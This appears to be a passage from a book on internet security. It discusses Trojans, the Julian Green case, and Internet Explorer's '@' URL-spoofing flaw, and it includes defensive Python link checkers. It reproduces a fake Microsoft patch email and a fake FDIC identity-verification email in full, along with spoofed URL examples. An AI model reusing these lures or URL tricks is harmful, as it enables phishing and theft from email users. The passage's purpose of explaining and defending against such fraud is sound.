Sobig was followed by Migmaf, which propagates in a similar manner but which augments the spamming duties of the zombie PC-turned-server: it adds the machine to a network of relays of pornographic content (I refuse to use the word “adult” in this context) whose origin, again, is completely untraceable.
Have you noticed how prescription drugs are now available without a prescription? As long as the source of a fraudulent prescription is traceable only to the broadband-connected personal computer of some unlucky family, then it’s easily done! Next of course will be illicit drugs. Get ready for mass-marketed Oxycontin. Get ready for a thriving market in personal secrets sold to shady divorce lawyers.
Fortunately Migmaf was not very skilled at getting past firewalls. Perhaps its authors guessed that consumers, who don’t have access to trained security people who can monitor their connections and watch for parasites, are a better target than organizations with the resources to try to track them down and prosecute them, or at least persecute them. That will of course change as the competing parasites saturate the home computer resource, forcing their perpetrators to use any of the many techniques for getting past firewalls. As the Aladdin Content Security Newsletter notes:
Although the scope of this latest infection is relatively small, experts warn that if this new trend continues and gathers momentum it may be harder and harder to stop; the key to tracking down and bringing the hacker to justice is the ability to back trace the culprit’s path to the location where the illegal activity originated from. By relaying information on a grand scale some hackers may, eventually, become completely and utterly untraceable.
Will the creators of Trojans like Migmaf become more skilled? Of course they will. Expect to see more stories like the following:
‘Trojan horse’ hacks into computer and ruins a life
One evening late in 2001, Julian Green’s seven-year-old daughter came out of the computer room of their home in Torquay, England, and said: “The home page has changed, and it’s not very nice.”
Mr Green found that the family PC seemed almost possessed. The internet home page had somehow been switched so that the computer displayed a child pornography site when the browser software started up. Even if he turned the machine off, it would turn itself back on and dial the internet on its own.
Mr Green called the computer maker and followed instructions to return his PC to a G-rated state. The porn went away, but the computer often crashed and kept connecting to the internet even when “there was no one in the blinking house”, he said.
But Mr Green’s problems were only beginning. Last October police searched his home and seized his computer. They found no sign of pornography in his home but discovered 172 images of child porn on the computer’s hard drive. They arrested Mr Green.
This month Mr Green was acquitted after arguing that the material had been gathered without his knowledge by a rogue hacker program—a so-called Trojan horse—that had infected his PC…
He was eventually exonerated, but his life has been turned upside down by the accusations. His ex-wife went to court soon after his arrest and gained custody of their youngest child and his house. Mr Green, who is disabled because of a degenerative disc disease, spent nine days in prison and three months in a “bail hostel”, or halfway house, and was allowed only supervised visits with his daughter.
“There’s some little sicko out there who’s doing this,” Mr Green said, “and he’s ruined my life. I’ve got to fight to get everything back.” He said he had no clue how the rogue software showed up on his computer. “I never download anything, and as far as I knew, no one had,” he said…
Things started turning around for Mr Green after the British press wrote about his acquittal, he said. One of the parents from his daughter’s school, who hadn’t spoken to him since the arrest, began talking to him the other day. “She must have said, ‘Perhaps he’s not a pervert after all’,” Mr Green said.
The story contains one important inaccuracy: Anti-virus software and programs will not ferret out and disable Trojans that may have been placed by a commercial enterprise. The obstacle is more legal than technical: vendors of anti-virus software are wary of litigation from pornographers and other commercial Trojan-planters who may be able to demonstrate some form of opt-in to get the material. Even if the opt-in was indirect, concealed, and gained from misleading offers, legally it counts. Mr. Green may have signed up for a healthcare newsletter and inadvertently consented to receive anything from the newsletter’s partners, and its partners’ partners, and its partners’ second cousins of golfing partners, and their parole officers’ partners…
Commenting on the Green case, David Sklar, coauthor of O’Reilly’s PHP Cookbook, notes the possibilities generated by the ability to plant targeted parasites:
It seems that to anyone familiar with the range of nastiness that a Trojan‘s capabilities encompass, depositing some child porn is a not-unexpected problem. Yet Julian Green fought an uphill battle to use this as a defense… a Trojan horse that is better at camouflaging itself than the investigator is at finding it… when combined with a targeted attack instead of random infection… would certainly make the accused’s pleas of “I’m innocent!” seem hollow. Child porn is good for discrediting political or business opponents; classified information for framing a government enemy; one criminal could use documents about entering the witness protection program to put false suspicion on another criminal…
Getting past a firewall is trivial if the Trojan is in an attachment to an email that uses advanced social engineering techniques. Even recipients who are trained to open attachments only from trusted sources will see an acquaintance’s email address in the “from” line of messages using those techniques.
Other new Trojan techniques don’t depend upon email at all. “Silver threading” is a sophisticated technique that inserts malicious code into normal application software. The significant competition in virus development kits means that anyone can take advantage of such techniques. Significantly, when those kits were first developed, there was no economic motive involved. No one had figured out how to make money with viruses; they were propagated only for sport. That was sufficient for what must have been some fairly dedicated development efforts, but now the spyware industry brings money to the table. Now your Trojans can be an army of dedicated employees, working around the clock for your clients in the fields of “legitimate” target marketing, pornography, international sex slavery, drugs, blackmail, “legal” research, and terrorism. None of the computer security profession’s existing products and approaches can do a thing to combat the next wave of parasitic software. Not even the eternal-vigilance approach of the top-notch managed security services providers, applied assiduously, will be able to stop this, or even slow it down.
It’s suggested that we limit all applications and system software to code that is digitally signed. (If you’re not acquainted with digital signatures, we will cover that in Part 3). Great idea—but who signs the code? Microsoft has had its executable code released to the public with digital signatures of impostors. As code signing becomes more and more commonplace, so will the opportunities for those with malice in mind to slip into the system and sign another company’s code. A small contract software development company might take some money on the side for slipping in a parasite or two that will do something on behalf of someone other than the main client.
Identity is the Foundation of Security. Identity does not mean the identity of the company, or the job title of whoever happens to have responsibility for a company’s code integrity at some random point in time. That company’s trucks are operated by drivers whose licenses identify the employee who is responsible for the safe operation of the vehicle. The job description and department are extraneous to the license certificate.
Identity means the irrefutable, authoritative identification of an individual human being.
“Cookieless data persistence is possible using these viable strategies,” by Jean-Luc David, builder.com, April 22, 2003.
“Editorial: A Subtle Privacy Issue,” by Kevin Yank, SitePoint Tech Times, May 26, 2004.
“Spammers use Trojans to enslave home PCs,” by Iain Thomson, VNUnet, June 6, 2003.
“Phatbot Trojan Analysis,” by LURHQ Threat Intelligence Group, www.lurhq.com/phatbot.html
“Web Bugs—Here Are the Rules,” Computer Business Review, November 27, 2002.
Aladdin Content Security Newsletter, July 30, 2003.
“‘Trojan horse’ hacks into computer and ruins a life,” The Age, Melbourne, August 11, 2003.
O’Reilly Developer Weblogs, August 11, 2003.
Social Engineering Improves Too
From: “MS Program Security Center” <jpzzkcvk@newsletters.msdn.com>
To: “Commercial User” <user_ngxmlqgqiz@newsletters.msdn.com>
All Products | Support | Search | Microsoft.com Guide
Microsoft
Microsoft User: this is the latest version of security update, the “March 2004, Cumulative Patch” update which fixes all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three new vulnerabilities. Install now to protect your computer from these vulnerabilities, the most serious of which could allow an attacker to run code on your system. This update includes the functionality of all previously released patches.
Windows 95/98/Me/2000/NT/XP
MS Internet Explorer, version 4.01 and later, MS Outlook, version 8.00 and later, MS Outlook Express, version 4.01
Customers should install the patch at the earliest opportunity.
Run attached file. Choose Yes on displayed dialog box.
You don’t need to do anything after installing this item.
Microsoft Product Support Services and Knowledge Base articles can be found on the Microsoft Technical Support web site. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site, or Contact Us. Thank you for using Microsoft products. Please do not reply to this message. It was sent from an unmonitored e-mail address and we are unable to respond to any replies.
Contact Us | Legal | TRUSTe
©2004 Microsoft Corporation. All rights reserved. Terms of Use | Privacy Statement | Accessibility
Does that message look familiar?
As you surely know by now, the message is bogus. Microsoft, Pacific Internet, and TRUSTe had nothing to do with it. The attachment is a worm.
When this and similar messages first appeared in mid-2003, however, a very large proportion of recipients, including technologically knowledgeable recipients, treated them as real. The perpetrators were clever enough to include valid hotlinks to Microsoft and TRUSTe. The wary, knowledgeable user rolls over the link and sees that it is legitimate.
Any user could be forgiven for coming to the conclusion that the messages are legitimate and opening the attachments. Even system administrators were still being socially engineered, i.e. tricked, by such things in 2006.
The perpetrators will get better at this. The only defense against this level of clever social engineering will be digital signatures from key pairs issued to individuals with identities established through the use of a strong face-to-face enrollment process.
Phishing for Dollars
The following message appeared in millions of mailboxes in early 2004:
To whom it may concern;
In cooperation with the Department Of Homeland Security, Federal, State and Local Governments your account has been denied insurance from the Federal Deposit Insurance Corporation due to suspected violations of the Patriot Act. While we have only a limited amount of evidence gathered on your account at this time it is enough to suspect that currency violations may have occurred in your account and due to this activity we have withdrawn Federal Deposit Insurance on your account until we verify that your account has not been used in a violation of the Patriot Act.
As a result Department of Homeland Security Director Tom Ridge has advised the Federal Deposit Insurance Corporation to suspend all deposit insurance on your account until such time as we can verify your identity and your account information.
Please verify through our IDVerify below. This information will be checked against a federal government database for identity verification. This only takes up to a minute and when we have verified your identity you will be notified of said verification and all suspensions of insurance on your account will be lifted.
http://www.fdic.gov/idverify/cgi-bin/index.htm
Failure to use IDVerify below will cause all insurance for your account to be terminated and all records of your account history will be sent to the Federal Bureau of Investigation in Washington D.C. for analysis and verification. Failure to provide proper identity may also result in a visit from Local, State or Federal Government or Homeland Security Officials.
Thank you for your time and consideration in this matter.
Donald E. Powell
Chairman Emeritus FDIC
John D. Hawke, Jr.
Comptroller of the Currency
Michael E. Bartell
Chief Information Officer
All parts of the message look legitimate, including the Web address (URL) for the Federal Deposit Insurance Corporation. The request itself seems a bit odd, however, so you look up the advice of the security experts, who tell us to examine carefully the address that appears in the browser window that opens when we click on the address in the message. Clicking on the address in the message, you carefully examine the address that appears in your browser’s address window. Sure enough, it is www.fdic.gov, the legitimate, valid address of the Federal Deposit Insurance Corporation’s website. Feeling confident that you have protected yourself by observing the directions of the security experts, you go ahead and fill in the FDIC form, providing the information requested.
But the site is a fake! You’re giving your confidential banking information to a bunch of thieves!
How Did That Happen?
The site was built by simply copying the site files from www.fdic.gov, modifying them to include a form where you enter your name, bank account number, social security number, address, phone number, and any other details that the thieves might find useful, and then planting the modified files on a server that has nothing to do with the FDIC’s servers.
Phishing is the odd name for one of the more effective techniques for committing fraud by means of social engineering. And a “vulnerability” in Windows Explorer makes it oh so easy. “Vulnerability” is in quotes because this particular idiosyncrasy was built into Explorer ostensibly to allow a username and password to be passed to a site through an invisible part of the URL in a kind of poor man’s single sign-on (SSO) scheme.
That particular “feature” of Explorer was well known. But as a perceptive vulnerability hunter known as Zap the Dingbat discovered in the last days of 2003:
By opening a specially crafted URL an attacker can open a page that appears to be from a different domain from the current location… By opening a window using the http://user@domain nomenclature an attacker can hide the real location of the page by including a non printing character (%01) before the “@”. Internet Explorer doesn’t display the rest of the URL making the page appear to be at a different domain.
Why does Explorer behave this way when a nonprinting character precedes the “@” in this special-case URL? Is it a genuine bug or is it a means to some purpose that we outside the Microsoft network of “partners” (as East Germany was a “partner” of the Soviet Union) can only imagine? Did someone in the Microsoft axis feel it would be useful to bring users to addresses that are not what they appear to be? Did they want to conceal their scheme for conveying state information via “legitimate” URLs—a legal but thoroughly manipulative version of the practice of phishing? Who knows. They never disclose these things, just as so many error messages never disclose the condition that made them appear. Microsoft is more than a company—it’s a bundle of hidden entangling alliances, with terms always dictated by Microsoft. We’ll never know what they’re doing with that lens through which passes an ever-increasing portion of our information and communications. “Features” we’re not told about, because they benefit partners instead of us hapless users, turn into vulnerabilities. We’re all picking cotton down on Microsoft’s plantation.
And so we have a steady stream of vulnerabilities, the latest of which—the clever little SSO-implementer built into Microsoft’s Internet Explorer—carries the flaw that makes it so much easier for thieves using phishing techniques to steal your money. That little trick with the @ sign in the URL, it turns out, was a bad idea. Worse, the vulnerabilities it introduces turn out to be difficult to fix, like those from other Windows design decisions. The window through which most of the world sees the Internet turns out to be a big vulnerability.
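What a mail filter or a careful reader can check for the `http://user@domain` trick described above, as an added example that is not code from the book or from Microsoft: split the URL the way RFC 3986 does, report the host actually contacted (everything after the last `@`), and flag userinfo that contains a non-printing character or is shaped like a domain name. The sample URLs are constructed; `203.0.113.5` is a documentation address standing in for the phisher’s server.

```python
"""Check where an http(s) link really points, guarding against the
user@host address-bar trick.

Added example; not code from the book or from Microsoft. The sample URLs
are constructed and 203.0.113.5 stands in for a phishing server.
"""
from urllib.parse import urlsplit, unquote


def _printable(text):
    """Drop ASCII control characters (0x00-0x1F, 0x7F) from text."""
    return "".join(ch for ch in text if ord(ch) >= 0x20 and ord(ch) != 0x7F)


def inspect_link(url):
    """Return the real host, what the link is dressed up as, and any findings."""
    parts = urlsplit(url)
    result = {"real_host": (parts.hostname or "").lower(), "displayed_as": None, "findings": []}
    if parts.scheme not in ("http", "https"):
        result["findings"].append("not an http(s) URL")
        return result

    # RFC 3986: everything before the last '@' in the authority is userinfo,
    # so the browser connects to whatever follows it, not to what precedes it.
    userinfo = parts.netloc.rpartition("@")[0]
    if not userinfo:
        return result  # plain host, nothing to hide behind
    result["findings"].append("userinfo embedded in URL")

    decoded = unquote(userinfo)
    # %01 and similar decoded to characters the affected IE builds did not draw,
    # so the address bar stopped displaying the URL right there.
    if _printable(decoded) != decoded:
        result["findings"].append("non-printing character before '@'")
    # A "username" containing dots is the tell-tale of a disguised link.
    visible = _printable(decoded.split(":", 1)[0])
    if "." in visible:
        result["displayed_as"] = visible.lower()
        result["findings"].append("userinfo is shaped like a domain name")
    return result


def link_matches_domain(url, expected_domain):
    """True only when the host actually contacted is expected_domain or a subdomain of it."""
    host = inspect_link(url)["real_host"]
    expected = expected_domain.lower()
    return host == expected or host.endswith("." + expected)


if __name__ == "__main__":
    # Constructed spoofed link of the kind described in the text.
    spoofed = "http://www.fdic.gov%01@203.0.113.5/idverify/cgi-bin/index.htm"
    report = inspect_link(spoofed)
    print("connects to:", report["real_host"], "| displayed as:", report["displayed_as"])
    for finding in report["findings"]:
        print("  -", finding)
    print("matches fdic.gov:", link_matches_domain(spoofed, "fdic.gov"))
```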
Regardless of the difficulty, vulnerabilities, once announced, must be fixed quickly. Certainly one expects a company as exposed as Microsoft and with the financial resources of Microsoft to respond very promptly. But in mid-January of 2004, users were still waiting, as illustrated in this story:
On a Microsoft security Webcast held Wednesday, participants were more interested in the whereabouts of a patch for a known Internet Explorer spoofing vulnerability than they were in the three new security bulletins that Microsoft released on Tuesday.
During the Webcast, Jeff Jones, senior director of Microsoft’s Trustworthy Computing initiative, told participants that Microsoft has been working on the IE patch since before Christmas, and it is done. But the testing is not completed for all the various versions of IE for different platforms and in all of the languages supported by Microsoft, he said.
By Microsoft Longhorn evangelist Robert Scoble’s count, there are more than 400 different IE iterations that need testing.
Once that happens, even if it’s sooner than Microsoft’s next slated security-bulletin release slated for Feb. 10, Microsoft will roll out the IE patch separately, Jones said.
A patch could come none too soon. Security experts say that they have seen a spike in phishing attacks after a December security bulletin revealed the IE spoofing exploit.
What does the world do when half a billion people depend upon one window through which to view the whole world, and the view through that window is distorted and manipulated by the smudges of all sorts of hidden agendas?
We could just live with it. We could all live with the fact that our perceptions are perpetually influenced by one enterprise and those of its partners who have paid its asking price to get their particular view of a part of the world pasted to the window.
Commercial enterprises do things this way. Don’t get me wrong—I’m an entrepreneur. I’m not one of those who from a comfortably funded perch rails against the evils of the profit motive. But being an entrepreneur, I know what enterprises do: they manipulate perceptions in order to build dependencies. (We’re all drug dealers, of a sort. Some of us try to ensure that what we sell not only takes away the pain but provides genuine benefit as well.) Today, the window through which the world gets its information and communication is provided by one commercial enterprise. This is such a bad idea.
Some things that make software vulnerable:
Complexity
Undocumented features serving unpublished agendas
Closed code
Certain link-on-the-fly approaches to software design
The software that provides the window through which the world gets its information and communication could be much simpler and still provide all the functionality that we expect. It could be made to adhere to standards such as those published by the W3C. Its code could be open to public scrutiny.
Furthermore, the window itself should be an integral part of the operating system. The irony of that fact will be appreciated when we recall that it was exactly the point on which the U.S. Justice Department made its antitrust case against Microsoft. Of all the charges that could have been brought against Microsoft for abuse of monopoly power, the government chose to accuse them of making progress in software design. Of course the operating system and the browser should be tightly integrated. Of course our information window should present things and act on our behalf with as little clutter and as few moving parts and “gotchas” as possible.
Microsoft was absolutely right to try to combine the browser and operating system. For that matter all the standard applications—word processor, spreadsheet, slide presentation software, database management system with contacts, email, calendar, personal finance including bank account links, simple general ledger and journals, document sharing and realtime collaboration, audio and video players including streaming media, publishing tools, basic programming tools—ought to be included also. That would give commercial software vendors a standard platform upon which to add value by providing templates and add-ons and specialized software for specialized industries.
With the new desktop platform and its PDA variants, there would never be a reason to introduce an incompatible file format. Anyone anywhere should be able to open a file sent by anyone anywhere. In contrast with current software that tends to provide no diagnostic information in error messages (thus maintaining your dependence on a channel partner’s certified technicians) it should tell you when asked exactly what it’s doing and what is preventing it from doing what it should be doing. Log files should be conveniently accessible by the user.
Its code should be available to and subject to the scrutiny of anyone who cares to scrutinize it. It should be regularly compiled from sources by independent local groups in cities and towns around the world, just to ensure that no one is sneaking in undocumented “features.” New features and standards should be the subject of worldwide debate.
Just as important as what should be in this common software package is what should not be in it. It should not have commercial agendas, hidden or otherwise. The software should not be something steering you this way and that. It should be like a roadway, accessible to any licensed driver responsibly driving a legal vehicle, without trying to influence where the driver goes and what he does.
Hmm, licensed driver. Here we are again, back to Identity Is the Foundation of Security. If we could identify the “driver” who is operating his vehicle in an irresponsible manner, then we would have an additional measure of protection. To use the example at hand, we should know who is attempting to subvert the URL-masking features of the browser.
But if we’re going to identify the drivers of the data vehicles on the information highway, we had better have a really sound means of protecting their privacy. There needs to be a real process in place, where the default condition is that information is not released to anyone.
Who Is Going to Do All This?
What commercial enterprise will dispense with the whole license-based software business model and simply distribute to the public, free of charge, software that today generates perhaps a hundred billion dollars of revenue every year for the software industry? Will the open source community provide the package? Certainly the open source people seem to be on this path. And yes, the product itself must be open source, so that we can all know what it is doing. The open source community is necessary, but it is not sufficient. In addition to that which is provided by the open source community, we will need two important components that it does not provide: authority and economics.
Authority is necessary because we are talking about a governed public platform. Only an entity with authority can govern. Often there is even less compatibility among open source software products than among commercial software products, where incompatibility has always been a weapon to be wielded against rivals. The authority that comes with duly elected governance processes can make and enforce the kinds of decisions that need to be made. Furthermore, if Identity Is the Foundation of Security, then we will see as we study public key infrastructure that not only is a certification authority necessary, but the authority of a certification authority has to be real.
Economics is necessary because, well, open source people need to eat. Traditional open source efforts seem either to turn commercial or wither on the vine. When they turn commercial they turn manipulative, repeating the sins that they had just accused their commercial counterparts of. When they wither they provide ammunition for the commercial enterprises that lecture customers about the unreliability of open source software.
The source code for the software that provides that window should not only be published for all the world to see; it should be owned by an organization with a charter like those of the ITU or the UPU, which are accountable to member governments; or the ISO, which is accountable to nonprofit national standards-making organizations. (The ITU and UPU, being affiliated with the UN, are able to invoke governmental authority, which can be an important ingredient in resolving differences among competing standards from rival standards bodies.)
Later, when we introduce the Real Estate Professional Infrastructure, we will see that we can import the business model of the real estate professions—architecture, construction, and property management—to provide a reliable source of income to those who design, build, and maintain facilities based upon the new platform to clients. This answers a big concern of many independent open source professionals: where can they find a viable business model that puts food on their table even if they don’t have marketing and finance departments or a brand like Apache or Firefox?
Now we have a sketch of a platform that can handily solve the problems that the hidden-URL feature dropped in our lap.
Will it happen? Seems like a lot to expect, doesn’t it. On the other hand, how many more worm attacks, how many increasingly sophisticated phishing expeditions, how many emptied bank accounts will it take before large numbers of people start realizing that things must change? At some point, large numbers of users—including the courts, governments, information technology departments, simply a large subset of everybody—will get behind a new idea: the public, in the form of an ITU-like organization, should provide a secure, open-standards platform for all to use. Since things are not going to improve without this kind of change, I feel the change is inevitable.
For now, the software that presents the window through which half a billion people see the world is proprietary, built from secret code, embodying unpublished features and facilities disclosed only to developers who have signed nondisclosure agreements.
In response, Microsoft and others come up with patches and workarounds. Let’s take a look at the latest, explained on February 3, 2004 by John McCormick:
Facing loud criticisms about the vulnerabilities in Internet Explorer and Windows Explorer, Microsoft has released a major patch that affects the way browsers interpret URLs. This article will help you determine whether these changes might affect your development environment.
No more @ signs in URLs
IE’s default behavior for handling http and https URLs in the address line has led to serious vulnerabilities known as URL spoofing. This is when a malicious Web site could appear to have another URL, tricking users into downloading malware or sharing personal information such as passwords.
Microsoft’s fix involves the elimination of URLs containing the @ character, such as:
http(s)://username:password@server/resource.ext
After you apply the patch, if user information is included in an http or an https URL, a Web page with the title “Invalid syntax error” appears by default.
Workarounds
Microsoft provides Web and application developers with workarounds to this patch. For URLs that are opened by objects calling WinInet or Urlmon functions, use the InternetSetOption function and include the following option flags:
INTERNET_OPTION_USERNAME
INTERNET_OPTION_PASSWORD
And, instead of the InternetOpenURL function, use the IAuthenticate Interface.
For URLs opened by a script using credentials for state management, start using cookies. (MSDN offers details on how to use HTTP cookies with Visual Basic in an ASP.NET program.)
Once you install the update in IE, altering registry values will let you apply the new behavior to other programs or to disable the feature in IE. (Note: Editing the registry is risky, so be sure you have a verified backup before saving any changes.)
Developers who work with Web sites that include the @ symbol in legitimate URLs will need to make some changes when Microsoft users apply the IE patch. The Knowledge Base article 834489 contains preliminary information, and Microsoft says it plans to add to the article as more information becomes available. But, for now, the Knowledge Base article should give you an opportunity to begin altering existing applications or Web sites and to avoid using the soon-to-be-invalid URL strings in any current projects.
Although these changes aren’t a direct response to MyDoom and other worms that have made headlines lately, they do represent a major change in the way IE and Windows Explorer will work and in the level of security they provide. It’s unfortunate but understandable that combating such a major threat will require some developers to alter existing programs to conform to the new syntax restrictions.
This workaround is provided by software professionals and explained by a software professional. You may take comfort in the thought that “I am not a software professional; those guys know better than I what to do about the problem and so I will accept their solution.”
But let’s suspend that thought for a moment and look at just what we know about the problem and our untutored impression of the viability of the solution. Ask yourself: will this work? Does this have the look and feel of a long-lasting fix to the problem? Circle your answer.
| No, my malicious hamster could get around that fix. | Yes, I defer to the judgment of those who are so close to the problem that they can’t see its dimensions. |
You’ve just got to do something about that hamster. It seems he knocked this one off in one day:
A patch Microsoft Corp. released on Monday for a dangerous Internet Explorer vulnerability that lets attackers trick Internet users into visiting malicious sites doesn’t completely fix the problem…
The MS04-004 patch addresses [the malformed-url] bug, but not a related problem. If the user visits a Web page containing such a malformed link and hovers the mouse over the link or selects it by tabbing through links in the page, the patched version of Internet Explorer will display the partial URL in the status bar.
For example, take the link: “www.paypal.com%00%01@security.eweek.com.” On an unpatched copy of Internet Explorer, clicking the link will open a new window and bring the browser to security.eweek.com, the eWEEK.com Security Topic Center. On a patched copy of IE the browser will go to an error page indicating illegal syntax. Still, on either version of IE, if you hover over the link on this page, the status bar will display www.paypal.com.
Ironically, the cumulative patch also fixed another bug in a different IE cumulative update from last year. That cumulative patch addressed several security issues in Internet Explorer, but also introduced bugs in the behavior of the IE scrollbar. The new patch fixes these bugs.
And then the story closes with this wonderful bit of irony that could only come from this never-never land of preposterously Byzantine software that we all depend upon:
Editor’s Note: This story was updated to remove an example of a malformed link. The code caused some antivirus software and patched versions of IE to report illegal coding.
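The trick described in the advisory above and in the eWEEK example (everything before the last “@” in a URL is treated as a username, so `www.paypal.com%00%01@security.eweek.com` really goes to security.eweek.com) is easy to make visible once a URL is split the way the standard prescribes. The following is an added example, not code from the original text, the advisory, or Microsoft’s patch. It uses Python’s standard `urllib.parse` to report the host a link actually resolves to, flags the presence of embedded userinfo and of hidden non-printing characters, and shows what a status bar should display instead of the decoy. The sample links are constructed for this example except for the eWEEK link quoted above; `analyze_link` and `safe_display` are names chosen here.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample inputs. The first is the link quoted from the eWEEK story;
# the other two are made up for this example.
SAMPLE_LINKS = [
    "http://www.paypal.com%00%01@security.eweek.com",
    "http://username:password@server/resource.ext",
    "https://www.example.com/account/login",
]

# Text shaped like a registrable hostname, e.g. "www.paypal.com".
HOSTNAME_LIKE = re.compile(r"[A-Za-z0-9-]+\.[A-Za-z]{2,}")


def analyze_link(url: str) -> dict:
    """Split a URL per RFC 3986 and report where it actually leads.

    Everything before the LAST '@' in the authority component is userinfo
    (username[:password]), not the host; the real host is whatever follows it.
    Returns the real host, the raw userinfo, and the reasons (if any) a link
    should be treated as deceptive.
    """
    parts = urlsplit(url)
    userinfo, _, _hostport = parts.netloc.rpartition("@")
    real_host = (parts.hostname or "").lower()
    reasons = []
    if userinfo:
        reasons.append("credentials (userinfo) embedded in URL")
        decoded = unquote(userinfo)  # turn %00 %01 etc. back into raw bytes
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
            reasons.append("non-printing characters hidden in userinfo")
        # Only the username part (before ':') is examined for a decoy hostname.
        if HOSTNAME_LIKE.search(decoded.split(":")[0]):
            reasons.append("userinfo is shaped like a hostname")
    return {
        "url": url,
        "real_host": real_host,
        "userinfo": userinfo,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


def safe_display(url: str) -> str:
    """What a status bar or link preview should show: scheme and real host only,
    never the userinfo that the decoy relies on."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.hostname or ''}"


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        result = analyze_link(link)
        print(f"{link}\n  actually goes to: {safe_display(link)}")
        print(f"  suspicious={result['suspicious']} {result['reasons']}")
```

Run as a script, the eWEEK link is reported as going to security.eweek.com with three reasons raised, the `username:password@server` form is flagged only for embedded credentials (which is exactly what the MS04-004 patch began rejecting outright), and the plain login URL passes clean. The same split logic belongs in any mail filter or link-preview code that shows users where a link leads.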
Back to the original January 15, 2004 story, for a closing note about the obvious:
While it is important for Microsoft to issue a fix, Maier [Dan Maier, the director of marketing for the Anti-Phishing Working Group] said, a security patch alone won’t solve the problem. A majority of consumers are unlikely to immediately update their versions of IE with the patch, leaving them open to spoofing.
Notice to users of popular desktop software: abandon hope, all ye who enter here. Just look at the chaos that is implicit in these reports. This stuff is falling apart!
But we’re being too hard on Microsoft in order to make a point. Phishing would probably be a thriving form of fraud even without the Explorer vulnerability. Like all the other forms of predatory behavior on today’s Internet, phishing is enabled more by anonymity than by any particular software vulnerability.
By now you probably can guess the QEI solution to the problem. If the original message is not signed by a properly authenticated individual, your mail program can be configured to automatically dump it into the trash. Even if you have not so configured your mail program, you can readily consider any messages that are unsigned or signed by some easily-spoofed identity to be suspect.
Until message-signing becomes commonplace, the phishing problem will be with us. A new approach called SmartMarks presents an image that is unique to each user on a site or in a mail message. When you see your own SmartMark on a site you can be quite sure that it’s authentic, as there would be no way for an impostor to know your SmartMark image without some fancy man-in-the-middle engineering.
Phony Security Harms You
Phony privacy makes it possible for nosy, avaricious—but legitimate—organizations to manipulate your perceptions and thereby manipulate your life. That’s pretty bad. But it’s nowhere near as bad as what’s in store for you and me as other groups with no legitimacy learn how to take full advantage of the age of ubiquitous high-speed Internet access to the home. That’s because the people who will take advantage of your new vulnerabilities are individuals and gangs with no legal form of organization. Unlike a corporation or other chartered organization that runs the risk of penalties and even dissolution if their activity is sufficiently antisocial to incur the displeasure of regulatory bodies, these are gangs and individual sociopaths with nothing whatsoever to lose. Here’s an article from Joe Connolly’s Networking Newsletter that illustrates why things are going to get worse:
Recent estimates project that the number of installed cable modems will grow to nearly one million by year end, and that the number of installed DSL circuits may also be close to a quarter of a million by year-end, more than double the size of last year’s installed base. The good news is that the high-speed on-ramp to the Internet that we’ve all been hoping for is well into the initial stages of construction. And for the first time in network history, telecommuters are experiencing a level of network performance that rivals what they get at the office.
One potential nightmare is the fact that these same high-speed pipes that bring the office into the living room can also serve as a conduit for a hacker community whose sole mission in life is to make yours miserable. For example, many cable modem services are implemented as one- or two-megabit shared channels that can support up to 32 simultaneous users. This means that it’s extremely easy for someone to pick up the Dynamic Host Configuration Protocol-assigned address for your workstation and launch their attacks over the same channel that you’re using to get your work done.
New network viruses, such as Sub-seven Trojan and Back Orifice, are particularly nasty because, unlike the recent Melissa and Chernobyl viruses, these variants can transfer remote control of a user’s PC over to a party who has anything but the best of intentions. And the even worse news is that some of these viruses can even escape initial detection by most of the popular anti-virus packages. This scenario does not change even for those users who are tunneled into a corporate network, because the corporate firewall is no defense against this type of localized attack.
This scenario creates the need for a whole new type of product—the personal firewall. The personal firewall is a product whose mission in life is to offer a level of protection that is comparable to what would be provided by a corporate firewall, but at a personal class of price. Enter Network ICE, a relatively new player formed by some seasoned Network General veterans. Network ICE recently announced a suite of products that combine secure agent-based protection at the end station together with a centralized monitor that can cooperate with individual agents to rapidly detect multi-station attacks.
Once installed, the end-station agent, called Black ICE, activates its network analysis logic to detect and block PCs and servers from a number of known hacking techniques (knowledge of over 200 techniques is supported initially). An extremely useful feature of Black ICE is that it will alert the user when any break-in attempts occur and will also identify intruders by domain name and Internet address. Thus, a more timely notification of attacks using Sub-seven Trojan and Back Orifice can be obtained.
Joe, electronic countermeasures just don’t work!
Recall the incident in July 1999, when Microsoft began letting users of its MSN and Hotmail send messages to people using AOL’s proprietary instant messaging software. Within hours AOL had installed blocking software. Scant hours after that, Microsoft released a workaround that let its users get around AOL’s blockage. AOL responded with new blocks, and so on for about a dozen iterations.
Joe writes about business networking issues for a business audience. That’s why the headline and the message of the article talk about telecommuters. Such gaping holes may interfere with peoples’ ability to do their job from home. It is not Joe’s job to concern his readers with the fact that as more and more of their life is managed from files on their home computers; cable modems and DSL make people like you and me horribly vulnerable in ways we must consider right now.
We’ve talked about the hazard of children innocently disclosing information about their lives to strangers masquerading as their peers, or strangers whose intentions are unwholesome. But consider for a moment the inevitability of online registration for activities for young people. Let’s say it’s done intelligently. Such registration takes place over secure, encrypted forms. If the information about your child’s identity and location and schedule is intercepted on its way to the Brownie Scout server, it can’t be interpreted. Encryption makes it unreadable.
But wait, what about the information on your own computer at home? Shall you have a household rule that nobody keeps any personal information about themselves and their whereabouts in the computer? That’s thoroughly impossible. Just the information about when files were created and edited can tell someone a lot about who tends to be at home at what time.
You see, the term “server,” like so many technology nouns that we hope so fervently mean something distinct and clear, is actually a vague concept. If your home computer is online in such a way that someone may retrieve information from it, then it is a server. Practically every computer at some moment is a server. Every computer on a cable or DSL line is definitely a server unless specific steps are taken to prevent it from being a server. That means your computer at home is ready and willing to serve up its information to any of the half billion people on the Net, unless you have taken steps to prevent it.
How Baby Tables Are Made: The Dark Side of ETL
